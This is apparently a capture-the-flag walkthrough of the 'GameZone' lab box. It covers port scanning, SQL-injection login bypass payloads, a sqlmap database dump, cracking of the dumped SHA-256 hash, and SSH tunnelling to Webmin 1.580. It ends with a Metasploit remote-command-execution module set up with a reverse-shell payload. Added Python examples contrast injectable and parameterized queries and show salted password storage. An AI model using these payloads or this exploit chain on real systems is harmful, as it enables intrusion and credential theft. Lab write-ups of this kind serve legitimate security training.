
GameZone Walkthrough

$ nmap -p0-65535 10.10.191.94 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-02 17:07 IST
Initiating Ping Scan at 17:07
Scanning 10.10.191.94 [2 ports]
Completed Ping Scan at 17:07, 0.38s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:07
Completed Parallel DNS resolution of 1 host. at 17:07, 2.22s elapsed
DNS resolution of 1 IPs took 2.22s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 17:07
Scanning 10.10.191.94 [2 ports]
Discovered open port 22/tcp on 10.10.191.94
Discovered open port 80/tcp on 10.10.191.94
Completed Connect Scan at 17:07, 0.37s elapsed (2 total ports)
Nmap scan report for 10.10.191.94
Host is up, received syn-ack (0.37s latency).
Scanned at 2021-07-02 17:07:46 IST for 3s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3.87 seconds
$ nmap -sV -sC -p22,80 10.10.191.94
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-02 17:10 IST
Nmap scan report for 10.10.191.94
Host is up (0.37s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.07 seconds

Username Enumeration - CVE-2016-6210

Username enumeration is possible against this OpenSSH version, so valid usernames on the target can be brute forced.

Local Privilege Escalation - CVE-2019-0211

Local privilege escalation is possible through Apache 2.4.18.

What is the name of the large cartoon avatar holding a sniper on the forum?

agent47

Input Forms

[screenshot: userpassinput]

[screenshot: searchinput]

Testing the input forms for SQL injection with Burp shows that the login form is vulnerable to injection attacks.

[screenshot: intruder]

Once the injection succeeds through one of the login form parameters, we are greeted with the portal page. Payloads tried:

' or 1=1 -- -
hi' or 'x'='x';
x' or 1=1 or 'x'='y
' or 0=0 #
' or 1=1 or "= 
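To show the defect behind the bypass above, here is an added example (not code from the GameZone box) that builds the login query by string concatenation beside its parameterized form, run against an in-memory SQLite copy of the users table; the table row is constructed, the hash is computed locally, and SQLite stands in for the target's MySQL.

```python
"""Login query built by string concatenation (the pattern the GameZone
login form exhibits) beside the parameterized form, run against an
in-memory SQLite stand-in for the dumped db.users table.
Added example, not the target's code; table contents are constructed."""
import hashlib
import sqlite3

# Constructed stand-in for the dumped table: username + SHA-256(password) in 'pwd'.
USERS = [("agent47", hashlib.sha256(b"videogamer124").hexdigest())]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return con


def login_vulnerable(con, username: str, password: str):
    """Concatenates user input into the SQL text: the quote in the payload
    closes the string literal and the remainder is parsed as SQL."""
    pwd = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND pwd='" + pwd + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username: str, password: str):
    """Same query with bound parameters: the input is only ever data."""
    pwd = hashlib.sha256(password.encode()).hexdigest()
    row = con.execute(
        "SELECT username FROM users WHERE username=? AND pwd=?",
        (username, pwd)).fetchone()
    return row[0] if row else None


def demo():
    con = make_db()
    payload = "' or 1=1 -- -"      # first payload from the list above
    return {
        "vuln_payload": login_vulnerable(con, payload, "anything"),  # 'agent47'
        "safe_payload": login_safe(con, payload, "anything"),        # None
        "safe_real": login_safe(con, "agent47", "videogamer124"),    # 'agent47'
    }


if __name__ == "__main__":
    print(demo())
```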

[screenshot: portal.png]

Intercept the request from the portal search form and copy it to request.txt:

[screenshot: postreq.png]

POST /portal.php HTTP/1.1
Host: 10.10.191.94
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.191.94/portal.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: http://10.10.191.94
Connection: close
Cookie: PHPSESSID=tembi8lf52qavglncpn8eriqq6
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

searchitem=dd

We can feed this request file to sqlmap to dump the database, including the password hashes.

$ sqlmap -r request.txt --dbms=mysql --dump
        ___
       __H__                                                                                                   
 ___ ___[.]_____ ___ ___  {1.5.6#stable}                                                                       
|_ -| . [']     | .'| . |                                                                                      
|___|_  ["]_|_|_|__,|  _|                                                                                      
      |_|V...       |_|   http://sqlmap.org                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:54:10 /2021-07-02/

[18:54:10] [INFO] parsing HTTP request from 'req.txt'
[18:54:11] [INFO] testing connection to the target URL
[18:54:12] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:54:12] [INFO] testing if the target URL content is stable
[18:54:13] [INFO] target URL content is stable
[18:54:13] [INFO] testing if POST parameter 'searchitem' is dynamic
[18:54:13] [WARNING] POST parameter 'searchitem' does not appear to be dynamic
[18:54:13] [INFO] heuristic (basic) test shows that POST parameter 'searchitem' might be injectable (possible DBMS: 'MySQL')
[18:54:14] [INFO] heuristic (XSS) test shows that POST parameter 'searchitem' might be vulnerable to cross-site scripting (XSS) attacks
[18:54:14] [INFO] testing for SQL injection on POST parameter 'searchitem'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:54:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:54:36] [WARNING] reflective value(s) found and filtering out
[18:54:42] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:54:43] [INFO] testing 'Generic inline queries'
[18:54:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:55:09] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[...snip...]
[19:05:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[19:05:18] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[19:05:18] [INFO] fetching current database
[19:05:18] [INFO] fetching tables for database: 'db'
[19:05:19] [INFO] fetching columns for table 'users' in database 'db'
[19:05:19] [INFO] fetching entries for table 'users' in database 'db'
[19:05:20] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:05:26] [INFO] writing hashes to a temporary file '/tmp/sqlmapv5hxb31e6168/sqlmaphashes-dz3pht73.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+

[19:05:32] [INFO] table 'db.users' dumped to CSV file '/home/user/.local/share/sqlmap/output/10.10.191.94/dump/db/users.csv'                                                                                                
[19:05:32] [INFO] fetching columns for table 'post' in database 'db'
[19:05:32] [INFO] fetching entries for table 'post' in database 'db'
Database: db
Table: post
[5 entries]
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | name                           | description                                                                                                                                                                                            |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | Mortal Kombat 11               | Its a rare fighting game that hits just about every note as strongly as Mortal Kombat 11 does. Everything from its methodical and deep combat.                                                         |
| 2  | Marvel Ultimate Alliance 3     | Switch owners will find plenty of content to chew through, particularly with friends, and while it may be the gaming equivalent to a Hulk Smash, that isnt to say that it isnt a rollicking good time. |
| 3  | SWBF2 2005                     | Best game ever                                                                                                                                                                                         |
| 4  | Hitman 2                       | Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing.                                          |
| 5  | Call of Duty: Modern Warfare 2 | When you look at the total package, Call of Duty: Modern Warfare 2 is hands-down one of the best first-person shooters out there, and a truly amazing offering across any system.                      |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

[19:05:32] [INFO] table 'db.post' dumped to CSV file '/home/user/.local/share/sqlmap/output/10.10.191.94/dump/db/post.csv'                                                                                                  
[19:05:32] [INFO] fetched data logged to text files under '/home/user/.local/share/sqlmap/output/10.10.191.94'

[*] ending @ 19:05:32 /2021-07-02/

From the sqlmap output we obtained a username and a password hash:

Username: agent47 Pass-Hash: ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14


From the enumeration phase we now have a username and a password hash, so let's crack the hash to recover the password.

hash: ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

First, let's identify the hash type. hash-identifier reports it as SHA-256:

$ hash-identifier ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   [email protected] #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] SHA-256
[+] Haval-256

Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))
--------------------------------------------------
 HASH: 

Using John the Ripper and SecLists to crack the password:

$ john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124    (?)
1g 0:00:00:00 DONE (2021-07-02 20:12) 3.448g/s 9969Kp/s 9969Kc/s 9969KC/s vidhus..vidamexicana
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed

Password is videogamer124.
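The crack above finishes instantly because the pwd column holds an unsalted SHA-256. As an added example (not code from the box), the direct lookup john performs is shown next to the salted, slow-KDF storage that would have resisted it; the wordlist and stored value are constructed, and PBKDF2-HMAC-SHA256 is used as the assumed replacement scheme.

```python
"""Why the dumped pwd column fell to a wordlist in under a second: it holds
an unsalted SHA-256, so each candidate word is hashed once and compared.
Beside it, per-user salt plus a slow KDF, which forces the same work to be
redone per user and per guess. Added example; wordlist and hash constructed."""
import hashlib
import hmac
import os

# Constructed wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "gamer", "videogamer124", "hitman47"]


def crack_raw_sha256(target_hex: str, words):
    """Direct lookup, as john's raw-sha256 mode does: one SHA-256 per word,
    no salt, so the same work would cover every user in the table."""
    for w in words:
        if hashlib.sha256(w.encode()).hexdigest() == target_hex:
            return w
    return None


def store_password(password: str, iterations: int = 200_000) -> str:
    """Salted PBKDF2-HMAC-SHA256; stored as 'iterations$salt_hex$hash_hex'."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Constructed target: the SHA-256 of the password computed locally.
    target = hashlib.sha256(b"videogamer124").hexdigest()
    print("raw sha256 cracked:", crack_raw_sha256(target, WORDLIST))
    stored = store_password("videogamer124")
    print("stored:", stored)
    print("verify correct:", verify_password("videogamer124", stored))
    print("verify wrong:", verify_password("hitman47", stored))
```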

In the scanning phase we found SSH and HTTP open. Let's use the credentials on SSH and try to log in to the target.

$ ssh agent47@10.10.191.94
The authenticity of host '10.10.191.94 (10.10.191.94)' can't be established.
ECDSA key fingerprint is SHA256:mpNHvzp9GPoOcwmWV/TMXiGwcqLIsVXDp5DvW26MFi8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.191.94' (ECDSA) to the list of known hosts.
agent47@10.10.191.94's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.

agent47@gamezone:~$

Getting user flag

[screenshot: usertxt]


Checking for vulnerable binaries, permissions, files and so on gives no fruitful results.

Listing the listening services shows several ports; most of them we have already used to get this far.

Port 10000 is new to us. Resolving the service name shows that Webmin is listening on it.

Webmin is a web-based tool for modifying system configuration files on *nix systems.


agent47@gamezone:~$ ss -tlpn
State       Recv-Q Send-Q      Local Address:Port                     Peer Address:Port
LISTEN      0      80              127.0.0.1:3306                                *:*
LISTEN      0      128                     *:10000                               *:*
LISTEN      0      128                     *:22                                  *:*
LISTEN      0      128                    :::80                                 :::*
LISTEN      0      128                    :::22                                 :::*
agent47@gamezone:~$ ss -tlp
State       Recv-Q Send-Q    Local Address:Port                     Peer Address:Port
LISTEN      0      80            127.0.0.1:mysql                               *:*
LISTEN      0      128                   *:webmin                              *:*
LISTEN      0      128                   *:ssh                                 *:*
LISTEN      0      128                  :::http                               :::*
LISTEN      0      128                  :::ssh                                :::*
agent47@gamezone:~$
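Port 10000 is bound to all interfaces here yet never appeared in the nmap scan, which is the signature of a filtered service. As an added example (not part of the original walkthrough), this parses the ss listing above (a constructed copy) and compares it with the ports the external scan reported, the kind of check an auditor runs to find listeners hidden behind a host firewall.

```python
"""Compare local listening sockets (ss -tlpn) with the ports the external
nmap scan saw, flagging services bound to all interfaces that the scan did
not reach (filtered) and services bound to loopback only.
Added example, not from the original page; SS_OUTPUT is a constructed copy
of the listing shown above."""
import re

SS_OUTPUT = """\
State       Recv-Q Send-Q      Local Address:Port                     Peer Address:Port
LISTEN      0      80              127.0.0.1:3306                                *:*
LISTEN      0      128                     *:10000                               *:*
LISTEN      0      128                     *:22                                  *:*
LISTEN      0      128                    :::80                                 :::*
LISTEN      0      128                    :::22                                 :::*
"""

NMAP_OPEN = {22, 80}  # ports reported open by the nmap scan at the top

# State, Recv-Q, Send-Q, then Local Address:Port; the port is whatever
# follows the last ':' so '*:22', '127.0.0.1:3306' and ':::80' all parse.
_LINE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+")


def parse_ss(text: str):
    """Return a list of (local_address, port) for each LISTEN line."""
    out = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            out.append((m.group(1), int(m.group(2))))
    return out


def audit(listeners, externally_open):
    """Classify each port: 'loopback' (127.0.0.1/::1 only), 'exposed' (seen
    by the external scan) or 'filtered' (bound to all interfaces but not
    seen from outside, so a firewall or similar sits in between)."""
    report = {}
    for addr, port in listeners:
        if addr in ("127.0.0.1", "::1", "[::1]"):
            report[port] = "loopback"
        elif port in externally_open:
            report[port] = "exposed"
        else:
            report[port] = "filtered"
    return report


if __name__ == "__main__":
    for port, verdict in sorted(audit(parse_ss(SS_OUTPUT), NMAP_OPEN).items()):
        print(f"{port:>6}  {verdict}")
```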

Let's check the firewall rules to see how this port is configured:

agent47@gamezone:~$ iptables -L
iptables v1.6.0: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.

No juicy results; the rules cannot be read without root.

Let's create an SSH local port forward to reach port 10000:

$ ssh -L 58553:localhost:10000 agent47@10.10.191.94
agent47@10.10.191.94's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.

agent47@gamezone:~$

Now access the Webmin portal on local port 58553 (which is tunneled to port 10000 on the target).

We are greeted with the Webmin login form:

[screenshot: webminloginform.png]

Let's try to log in with the credentials we obtained in the enumeration phase.

Webmin is running with version 1.580

[screenshot: webmininternal]

With the help of searchsploit we learn that this version (1.580) is vulnerable to RCE.

There is a Metasploit module for it.

[screenshot: searchsploit]

Let's fire up Metasploit and try to gain access.

[screenshot: metafireup.png]

msf6 > search webmin

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_packageup_rce      2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution
   3  exploit/unix/webapp/webmin_upload_exec       2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE
   4  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   5  exploit/linux/http/webmin_backdoor           2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor


Interact with a module by name or index. For example info 5, use 5 or use exploit/linux/http/webmin_backdoor

msf6 > use 0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show options

Module options (exploit/unix/webapp/webmin_show_cgi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Webmin Password
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     10000            yes       The target port (TCP)
   SSL       true             yes       Use SSL
   USERNAME                   yes       Webmin Username
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin 1.580


msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set PASSWORD videogamer124
PASSWORD => videogamer124
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RPORT 58553
RPORT => 58553
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RPORT 58553
RPORT => 58553
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set USERNAME agent47
USERNAME => agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) >

Running the exploit and getting the root flag

[screenshot: roottxt]